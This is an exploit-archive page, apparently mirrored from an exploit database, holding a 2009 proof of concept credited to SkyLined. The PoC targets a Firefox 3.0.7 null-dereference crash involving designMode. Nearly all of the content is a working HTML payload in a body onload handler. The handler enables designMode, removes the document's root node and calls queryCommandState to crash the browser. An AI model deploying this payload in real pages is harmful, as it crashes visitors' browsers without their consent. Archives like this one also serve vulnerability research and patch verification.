[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Mozilla Firefox 3.0.7 OnbeforeUnLoad DesignMode Dereference Crash
# Published : 2009-03-16
# Author : SkyLined
# Previous Title : VLC 0.9.8a Web UI (input) Remote Denial of Service Exploit
# Next Title : WinAsm Studio 5.1.5.0 Local Heap Overflow PoC


<BODY onload="document.designMode='on';//string

alert('Design mode is on!');
document.removeChild(document.firstChild);//object;
document.queryCommandState('BackColor');
alert('Close the Window to see the crash!');

">

# www.Syue.com [2009-03-16]